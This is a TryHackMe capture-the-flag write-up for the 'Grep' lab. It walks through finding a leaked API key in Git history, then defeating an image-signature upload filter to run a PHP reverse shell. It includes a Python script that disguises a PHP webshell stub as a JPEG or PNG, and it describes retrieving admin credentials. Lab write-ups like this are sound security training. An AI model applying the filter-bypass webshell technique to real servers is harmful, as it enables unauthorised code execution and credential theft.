Grep Writeup - TryHackMe

This Grep challenge tests your reconnaissance and OSINT skills using a vulnerable machine hosted on TryHackMe.


Start this room by hitting the “deploy” button. Once deployed, you are assigned an IP address.

Below is the Nmap command used for scanning. -n skips reverse DNS, -Pn skips host discovery (the box may not answer ping), -p- covers all 65535 TCP ports, and -A adds OS and version detection plus the default scripts (OS detection is why it needs sudo). -T5 with --min-parallelism 100 makes the scan fast at the cost of possibly dropped probes on a lossy VPN link, so rerun anything that looks odd with default timing.

```bash
sudo nmap -n -A -Pn --min-parallelism 100 -T5 -p- <IP>
```

The scan reveals three open ports.


Visit port 80 and you’ll see the default Apache page. Directory busting yields no useful results.


On port 443 the browser shows a certificate warning, because the certificate it is served is not trusted for the address you browsed to. Inspect the certificate details anyway: they give the first clue, the hostname grep.thm that the certificate was issued for.

Add an entry to /etc/hosts mapping the machine's IP to grep.thm, then ping the name to confirm it resolves to the machine. The hosts entry does not make the certificate trusted; it only lets you reach the site by the hostname it is configured for.

Now browse to https://grep.thm.


Attempt to register an account. The request is rejected with the error “Invalid or expired API key.”

Search GitHub for “SearchME grep.thm” to find the repository of the CMS the site runs. In it, open register.php. The API key has been removed from the current version of the file, so check the file's commit history: the commit that removed it still shows the old value in its diff. Secrets that were once committed stay in the history even after they are deleted from the working tree.

The API key is: ffe60ecaa8bba2f12b43d1a4b15b8f39

Intercept the registration request in Burp Suite, replace the API key parameter with the value recovered from the repo, and forward the request. Registration succeeds. The key is a client-supplied value that the server merely compares against its own copy, so the check is only as good as the secrecy of the key, and a key sitting in a public repository's history is no secret at all.

Log in to your account and retrieve the first flag.


Flag 1: THM{4e****************************bb}

Back in the GitHub repo, read upload.php. It validates uploads by their hex signature, i.e. it checks that the file begins with the magic bytes of a JPG, PNG or GIF. Only the leading bytes are inspected, so a PHP script that starts with a valid image signature passes the check. Then visit the upload.php page on the site.

Take pentestmonkey's PHP reverse shell and set its $ip and $port variables to your attacking machine's address and the port your listener will use.

Rename the file with a .jpg extension, then open it in a hex editor and overwrite the first bytes with a real JPEG signature (FF D8 FF) so that the upload check accepts it as an image.

Upload the file; a successful upload confirmation appears. With a listener waiting on the port you configured, browse to the uploaded file in the upload folder. The server executes it as PHP and the reverse shell connects back.

TIP

If no shell comes back, the hex edit most likely overwrote part of the <?php open tag on the first line, so PHP serves the file as plain text instead of executing it. Put a throwaway comment line at the very top of the script and move the <?php tag to the line after it: the bytes you overwrite then belong to the padding line, not to the tag. Anything outside the PHP tags is just echoed as text, so the damaged padding does no harm.
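The following is an added example, not code from the writeup or from the SearchME CMS. It reconstructs the two sides of the upload step above: a check_signature() filter that, like the upload.php described, only looks at the leading bytes of a file, and the two ways of making the reverse shell pass it. overwrite_signature() does what the hex editor does (replace the first bytes in place) and shows why a script that starts with <?php on line 1 breaks, while a padding line keeps the tag intact; prepend_signature() puts the header in front of the script instead, which never touches the tag. The signature values are the standard JPEG, PNG and GIF magic bytes (the exact hex that upload.php compares is not shown on this page, so treat check_signature() as an assumed equivalent, not the real code), and the PHP payload is a constructed stand-in for the pentestmonkey script.

```python
from typing import Optional

# Standard leading bytes of each image type. Assumption: upload.php compares
# against something equivalent; its exact hex values are not shown on the page.
SIGNATURES = {
    "jpg": bytes.fromhex("ffd8ff"),
    "png": bytes.fromhex("89504e470d0a1a0a"),
    "gif": b"GIF8",  # GIF87a and GIF89a both start with "GIF8"
}


def check_signature(data: bytes) -> Optional[str]:
    """Return which image type the leading bytes claim, or None.

    Reconstruction of a typical hex-signature upload filter, not the real
    upload.php: it looks only at the first few bytes and ignores the rest.
    """
    for kind, sig in SIGNATURES.items():
        if data.startswith(sig):
            return kind
    return None


def php_tag_intact(data: bytes) -> bool:
    """True if a <?php open tag still exists somewhere in the file."""
    return b"<?php" in data


def overwrite_signature(data: bytes, kind: str) -> bytes:
    """What a hex editor does: replace the first len(sig) bytes in place.

    If the script starts with <?php, the tag itself is clobbered and PHP will
    serve the whole file as plain text instead of executing it.
    """
    sig = SIGNATURES[kind]
    if len(data) < len(sig):
        raise ValueError("file shorter than the signature")
    return sig + data[len(sig):]


def prepend_signature(data: bytes, kind: str) -> bytes:
    """Safer variant: put the signature in front of the script instead.

    PHP echoes bytes outside <?php ... ?> verbatim, so the junk header is
    harmless and the open tag is never touched.
    """
    return SIGNATURES[kind] + b"\n" + data


# Constructed stand-ins for the reverse shell (the real pentestmonkey script is
# much longer; like this one, it starts with <?php on line 1).
SAMPLE_PHP = b"<?php system($_GET['cmd']); ?>\n"
SAMPLE_PHP_PADDED = b"// padding line, safe to overwrite\n" + SAMPLE_PHP


if __name__ == "__main__":
    cases = [
        ("original script", SAMPLE_PHP),
        ("hex edit, <?php on line 1", overwrite_signature(SAMPLE_PHP, "jpg")),
        ("hex edit, padding line first", overwrite_signature(SAMPLE_PHP_PADDED, "jpg")),
        ("header prepended", prepend_signature(SAMPLE_PHP, "png")),
    ]
    for label, blob in cases:
        print(f"{label:30} passes={check_signature(blob)!s:5} php_ok={php_tag_intact(blob)}")
    # Write the variant you would actually upload.
    with open("shell.jpg", "wb") as fh:
        fh.write(prepend_signature(SAMPLE_PHP_PADDED, "jpg"))
```

Run it stand-alone to see the four cases side by side: the unmodified script fails the filter, the naive hex edit passes the filter but loses its <?php tag, and both the padded hex edit and the prepended header pass while keeping the tag. For the real upload, drop in the full reverse-shell source in place of SAMPLE_PHP.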

With shell access, locate users.sql containing admin credentials.


Admin Email: admin@searchme2023cms.grep.thm

On the box, look in the leakchecker directory. It holds two files; one of them is a tool that checks whether credentials have been leaked, and it is served from a separate vhost.

Leak checker hostname: leakchecker.grep.thm

Add this name to /etc/hosts as well, pointing at the same IP. Then go to https://leakchecker.grep.thm and enter the admin email: the leak checker returns the admin password in clear text. A checker that hands back the leaked password itself, rather than a yes/no answer, is an information disclosure in its own right.

emailleak_checker

Admin Password: a**************!

Source: https://blog.hanzalaghayasabbasi.com/posts/grep/
Author: Hanzala Ghayas Abbasi
Published: 2023-08-30
License: CC BY-NC-SA 4.0